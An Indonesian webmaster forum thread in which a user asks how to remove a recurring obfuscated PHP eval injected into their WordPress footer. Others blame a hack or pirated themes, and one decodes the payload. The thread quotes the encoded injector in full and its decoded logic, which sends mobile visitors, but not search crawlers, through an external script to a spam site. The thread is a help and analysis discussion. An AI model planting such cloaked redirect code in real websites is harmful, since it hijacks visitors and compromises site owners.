Help : ada kode <?php eval di footer,Bagaimana cara menghilangkannya??

Mastah mohon bantuannya untuk menghilangkan kode ini di footer gimana ya ?

PHP:

<?php
eval("\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050\163\164\162\162\145\166\050'==QfgsDdphXZgsTKog2c1xmZgszJ+QHcpJ3Yz9CP+Iycq5SMucjLx0SeyVWdxp2Lt92YusmcvdXZtFmcm1SeyVWdxp2LvoDc0RHai0zYyNHI0BXayN2c8cCIvh2YlByegkSKddCVOV0RB9lUFNVVfBFVUh0JbJVRWJVRT9FJABCLnk2cvUGbn92bnxHelRmbhlHfyVWehxGctwVYpRWZt1CXzd3bk5Wa3xHZh9Gbud3bkxHduFmdhxXYjlmcl1WY8h2cvRnbpNWYt9yJog2Y0FWbfdWZyBXIgYiJgkSKddiUFJVRGVkUfBFVUh0JbJVRWJVRT9FJABCLnk2cv0Tc/wVb8h2YyFWZz12LngCajRXYt91ZlJHcgwHfgkSXnQlTFdUQfJVRTV1XQRFVIdyWSVkVSV0UfRCQgwyJpN3LlRne812bvhHfhRGe8N3clxWZyl2d8N3biV2d8BXY3xXZu9mZhR2b2x3aulGbuwFc1xnclN3dvJnYuwFc1x3c1xWZ0xXZslmYv1WL0xnbhlmYtl3c8lnbvNHfl52boBHdyFWbzxXLll2c8Bnchh2c81WZnF2c8VmbvhGc8NHcpxWaoBHfjlmbvNXYuFGc81GbhBHfhl2av5GftMWZuxXYs9mcvR3btxXai9Wb8BXbtxHcklWb8lmbp1mLhJXZw9GfhZXYqxXZtJja8R2bwlGfxFGcpxHZhBXa8VmbvhGcpxXZslmYv1WZpx3Y0hGfl5WahxWZ89WbvN2bkxHdlt2YpJ3Y8xGblNGfx5WZixXeyJXZit2YhxmY892Z05WY2FGfkl2byRmbhxXav1WY8xWZ0F2YsF2LngCajRXYt91ZlJHcgwHfgkSXnQFUFN0QB9FUURFSnslUFZlUFN1XkAEIscSaz9Cbth3KcxWb0hGeuAXY35CZuZ3Lc52bpRXYjlGbwBXY8xWb35CchdnLk5mdvwFd4VGdvcCKoNGdh12XnVmcwhCKgYWa'\051\051\051\073");
?>

saya uda menghilangkan kode itu berkali2 tapi besoknya selalu muncul lagi . ini uda ketiga kalinya seperti itu.
dan itu menyerang hampir semua di blog saya .

Mohon bantuan para mastah disini..

 

ada penyusup masuk itu masbro...

 

iya mastah,,webku jadi aneh pas di cek di cekpr anchor text bisa berubah semua..cara mengatasinya gimana ya??sy uda hubungi support hosting tpi katanya itu theme issue. padahal uda sy hapus themesnya dan cari themes lain tapi tetep ada lagi kode tersebut..mohon bantuan para mastah

 

Hosting di hawkhost ya om?

 

Help : ada kode &lt;?php eval di footer,Bagaimana cara menghilangkannya??

Itu kena hack, hub cs hostingnya saja biar dibersihkan....


Ikut-ikutan beli TapaTalk.

 

iya di hawkhost... uda hubungi cs hawkhost tapi itu katanya themesnya yg bermasalah jadi dia ga bisa bersihkan..uda ganti themes tapi tetep aja...ada yg pernah kayak gini ga??terus solusinya gimana??

 

ganti theme nya udah dicek footernya g ada script itu? pastikan SELALU pake yg non bajakan ya, kl bajakan, mereka suka pinter nyimpen encoded file induknya, kl cuma diilangin yg difooter sering masih kena jg. cek semua plugin juga(terutama yg bajakan), scan dgn plugin security ninja/plugin lainnya atau servis dari sucuri.net.
kl yakin TIDAK ADA komponen yg bajakan, brarti ada plugin/themes yg g uptodate, atau kena hack. ya, balik lagi teliti satu persatu perfile, atau sewa tenaga yg berpengalaman. biasakan cek sendiri saja skalian belajar, soalnya yg spt ini udah seperti makanan para webmaster, sering bgt kejadian.

 

coba cek di function.. biasanya bersarang disitu..

 

beresin dl bersih2nya trus pindah dari hawkhost. pengalaman sy disana bakal cape ngurusin beginian.

 

footer.php itu kan isininya include header , sidebar. mungkin juga di file lain nya

 

saya uda menghilangkan kode itu berkali2 tapi besoknya selalu muncul lagi

coba cek di host ente ada penyusup gak, cari file shell php, ane paling benci ginian, selalu ane cari tahu siapa pemiliknya, cari tahu smua domainnya, lalu submit report ke google (klo dia pake adsense), klo dia pake ads lain, ya tetep report ke mereka biar ancur site + incomenya..

 

Re: Help : ada kode &lt;?php eval di footer,Bagaimana cara menghilangkannya??

Coba diencode aja... pertama2, kode yang pake backslash itu ascii. Liat kamusnya..

Kemudian pake eval decoder, banyak gratisan di internet... nanti bisa ketauan dia nulis apaan...

Sent from my Lenovo S880 using Tapatalk 2

 

Maaf ts ya, OOT sedikit kebetulan udah lama penasaran dengan encript (atau apa ya istilahnya) model begini,, "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050\163\164\162\162\145\166" itu sebetulnya encrypt model apa ya?? yang jelas bukan base64 kayaknya, ,, mau nyari via google juga bingung mo ngetik apaan wong gak tahu istilahnya,,

ada yang bisa bantu gak? atau setidaknya ngasih petunjuk keyword yang harus saya ketikan di google apa untuk mencari tahu soal ini,,

 

Re: Help : ada kode &lt;?php eval di footer,Bagaimana cara menghilangkannya??

Itu ascii biasa.. coba aja liat di kamus ascii utk kode di belakang tanda backslashnya.. nanti keliatan dia nulis apaan

 

Sama punya saya kemaren Om,, semua file website dalam satu host kensa semua malah, parahnya lagi hasil pencarian dari google di direct ke site sampah,, parah kan
mentok langsung saya backup database trus install ulang smuanya..

 

kl pake themes yg gratisan gimana mastah??ternyata semua yg berbau .php kena semua..dan parahnya itu satu hosting yg kena...padahal web yg didalamnya ane pake PTR semua,,repot juga ni kl mau diinstal ulang satu persatu...makasi sarannya mastah

 

setelah di decode, isinya beginian....

PHP:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script src="http://jquery-framework.com/jquery-1.7.1.js"></script>'; flush(); exit; }

isi dari javascriptnya

Code:

[COLOR=#000000][FONT=Times New Roman][FONT=verdana]window.location = "http://httpab.com/s/3013 ";[/FONT][/FONT][/COLOR]

ke-redirect ke situs itu visitornya...

bakalan capek nie om bersih2nya kalo satu host yang kena.. semangat..!!!